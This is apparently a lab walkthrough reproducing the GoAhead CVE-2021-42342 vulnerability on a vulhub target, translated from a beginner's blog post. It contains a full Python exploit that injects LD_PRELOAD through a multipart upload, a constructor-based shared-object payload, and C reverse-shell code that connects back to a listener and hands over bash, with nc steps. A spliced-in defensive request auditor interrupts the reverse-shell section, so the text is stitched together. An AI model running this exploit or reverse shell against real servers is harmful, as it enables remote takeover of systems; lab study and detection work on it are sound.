Required environment
Environment setup
Vulnerability reproduction
PoC (vulnerability reproduction)
Reverse shell
PoC (reverse shell)
Required environment:
- Linux (Kali) operating system
- vulhub target range
- Windows 7 (with nc)
Environment setup:
- Open a terminal and enter: cd /root/桌面/vulhub-master/goahead/CVE-2021-42342/ to change into the target directory
- In that directory run: docker-compose up -d
- Check which port the container exposes: docker ps
- Once startup has finished, visit http://your-ip:8080/ to see the welcome page. Visit http://your-ip:8080/cgi-bin/index to see the Hello page, which is the output of the CGI program.
Example (screenshot):
Vulnerability reproduction
Write the PoC code for the print test as follows (payload.c):
#include <unistd.h>

/* Marked as a constructor, so the dynamic loader runs before_main when the
   shared object is loaded, before the program's main(). */
static void before_main(void) __attribute__((constructor));
static void before_main(void)
{
    /* A minimal CGI response: one header line, a blank line, then the body. */
    write(1, "Hello: World\r\n\r\n", 16);
    write(1, "Hacked\n", 7);
}
Example (screenshot):
This way the before_main function is called before the program's main runs. Compile it with the following command:
gcc -s -shared -fPIC ./payload.c -o payload.so
Example (screenshot):
Use the script poc.py to send the malicious request and reproduce the vulnerability:
PoC:
File extension: .py
import sys
import socket
import ssl
import random
from urllib.parse import urlparse, ParseResult

PAYLOAD_MAX_LENGTH = 16384 - 200


def exploit(client, parts: ParseResult, payload: bytes):
    path = '/' if not parts.path else parts.path
    boundary = '----%s' % str(random.randint(1000000000000, 9999999999999))
    padding = 'a' * 2000
    # The declared Content-Length is deliberately smaller than the real body.
    content_length = min(len(payload) + 500, PAYLOAD_MAX_LENGTH)
    # Multipart request: the first field is named LD_PRELOAD, the second is a file upload.
    data = fr'''POST {path} HTTP/1.1
Host: {parts.hostname}
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary={boundary}
Content-Length: {content_length}

--{boundary}
Content-Disposition: form-data; name="LD_PRELOAD";

/proc/self/fd/7
--{boundary}
Content-Disposition: form-data; name="data"; filename="1.txt"
Content-Type: text/plain

#payload#{padding}
--{boundary}--
'''.replace('\n', '\r\n')
    data = data.encode().replace(b'#payload#', payload)
    client.send(data)
    resp = client.recv(20480)
    print(resp.decode())


def main():
    target = sys.argv[1]            # e.g. http://your-ip:8080/cgi-bin/index
    payload_filename = sys.argv[2]  # the compiled shared object, e.g. payload.so
    with open(payload_filename, 'rb') as f:
        data = f.read()
    if len(data) > PAYLOAD_MAX_LENGTH:
        raise Exception('payload size must not be larger than %d' % PAYLOAD_MAX_LENGTH)
    parts = urlparse(target)
    port = parts.port
    if not parts.port:
        if parts.scheme == 'https':
            port = 443
        else:
            port = 80
    context = ssl.create_default_context()
    with socket.create_connection((parts.hostname, port), timeout=8) as client:
        if parts.scheme == 'https':
            with context.wrap_socket(client, server_hostname=parts.hostname) as ssock:
                exploit(ssock, parts, data)
        else:
            exploit(client, parts, data)


if __name__ == '__main__':
    main()
Example (screenshot): (since my current directory contains payload.so, I simply appended payload.so at the end; mind the directory your terminal is in.)
Reverse shell
PoC:
File extension: .c
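From the defender's side, the request that poc.py builds has three recognisable traits: a multipart field whose name is a dynamic-loader variable (LD_PRELOAD), an uploaded file whose content is an ELF shared object, and a Content-Length that understates the real body. The following is an added example, not code from the original post or from vulhub: a small request auditor that parses a raw multipart/form-data request and reports those traits, suitable for a WAF rule or a log-replay check. The LD_ prefix list, the sample boundary, the host 192.0.2.10 and the request bodies built by build_sample are all my own constructed values.

```python
import re

# Loader environment variables an HTTP client must never be able to set.
# (Assumption: the LD_ prefix is my generalisation; the PoC above only uses LD_PRELOAD.)
LOADER_ENV_PREFIX = "LD_"
ELF_MAGIC = b"\x7fELF"  # first four bytes of every ELF file, including .so objects


def parse_request(raw: bytes):
    """Split a raw HTTP request into (headers, body, parts).

    Each part is (field_name, filename_or_None, body_bytes)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.split(b"\r\n")[1:]:  # skip the request line
        key, _, value = line.partition(b":")
        headers[key.strip().lower().decode()] = value.strip().decode(errors="replace")
    match = re.search(r'boundary="?([^";]+)"?', headers.get("content-type", ""))
    if not match:
        return headers, body, []
    delimiter = b"--" + match.group(1).encode()
    parts = []
    for chunk in body.split(delimiter)[1:]:
        if chunk.startswith(b"--"):  # closing delimiter "--boundary--"
            break
        part_head, _, part_body = chunk.lstrip(b"\r\n").partition(b"\r\n\r\n")
        if part_body.endswith(b"\r\n"):  # the CRLF before the next delimiter is not payload
            part_body = part_body[:-2]
        name = re.search(rb';\s*name="([^"]*)"', part_head)
        filename = re.search(rb'filename="([^"]*)"', part_head)
        parts.append((name.group(1).decode() if name else "",
                      filename.group(1).decode() if filename else None,
                      part_body))
    return headers, body, parts


def audit_request(raw: bytes):
    """Return a list of findings for one raw request; an empty list means nothing was flagged."""
    headers, body, parts = parse_request(raw)
    findings = []
    declared = headers.get("content-length")
    if declared is not None and declared.isdigit() and int(declared) != len(body):
        findings.append(f"content-length mismatch: declared {declared}, actual {len(body)}")
    for name, filename, part_body in parts:
        if name.upper().startswith(LOADER_ENV_PREFIX):
            findings.append(f"form field sets dynamic-loader variable {name}")
        if part_body.startswith(ELF_MAGIC):
            findings.append(f"uploaded part {name!r} ({filename}) is an ELF object")
    return findings


def build_sample(field_name: str, field_value: str, file_body: bytes, declared_length=None) -> bytes:
    """Constructed sample request in the shape of the PoC above (boundary and host are made up)."""
    boundary = "----1234567890123"
    body = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field_name}";\r\n'
        "\r\n"
        f"{field_value}\r\n"
        f"--{boundary}\r\n"
        'Content-Disposition: form-data; name="data"; filename="1.txt"\r\n'
        "Content-Type: text/plain\r\n"
        "\r\n"
    ).encode() + file_body + f"\r\n--{boundary}--\r\n".encode()
    if declared_length is None:
        declared_length = len(body)
    head = (
        "POST /cgi-bin/index HTTP/1.1\r\n"
        "Host: 192.0.2.10\r\n"
        f"Content-Type: multipart/form-data; boundary={boundary}\r\n"
        f"Content-Length: {declared_length}\r\n"
        "\r\n"
    ).encode()
    return head + body


if __name__ == "__main__":
    benign = build_sample("username", "alice", b"hello world")
    suspicious = build_sample("LD_PRELOAD", "/proc/self/fd/7", ELF_MAGIC + b"A" * 64, declared_length=100)
    print("benign:", audit_request(benign))
    print("suspicious:", audit_request(suspicious))
```

The benign request produces no findings; the one shaped like the PoC produces three, in the order mismatch, loader variable, ELF upload. A CGI front end that forwards form fields into the process environment is the root condition here, so the field-name check is the one worth keeping even after the upload path is locked down.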
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/* Address and port of the listener (the author's lab values; change them to
   the host and port where nc is listening). */
char *server_ip = "192.168.75.150";
uint32_t server_port = 9999;

/* Constructor: runs when the shared object is loaded, before main(). */
static void reverse_shell(void) __attribute__((constructor));
static void reverse_shell(void)
{
    int sock = socket(AF_INET, SOCK_STREAM, 0);
    struct sockaddr_in attacker_addr = {0};
    attacker_addr.sin_family = AF_INET;
    attacker_addr.sin_port = htons(server_port);
    attacker_addr.sin_addr.s_addr = inet_addr(server_ip);
    /* Give up silently if the listener cannot be reached. */
    if (connect(sock, (struct sockaddr *)&attacker_addr, sizeof(attacker_addr)) != 0)
        exit(0);
    /* Point stdin, stdout and stderr at the socket, then replace the process with bash. */
    dup2(sock, 0);
    dup2(sock, 1);
    dup2(sock, 2);
    execve("/bin/bash", 0, 0);
}
Open a system that has nc and check its IP address:
Example (screenshot):
Open shell.c, change the IP address in it to the address of the system running nc, and change the port to the one nc will listen on:
Example (screenshot):
After editing, go back to the system running nc, start nc and listen:
nc -lvvp 9999  # the port can be any unused port you choose
Example (screenshot):
Back in Kali, enter the following command to build the PoC (shell.c):
Example (screenshot):
A shell.so is then generated in the current directory:
Example (screenshot):
Run the payload:
Example (screenshot): (the script may report an error at this point, but it does not matter)
Go back to the system running nc and check nc:
Example (screenshot):
Afterword:
I know this kind of vulnerability is trivial to the experts, but since you have read this far, please give a beginner a follow. Thanks.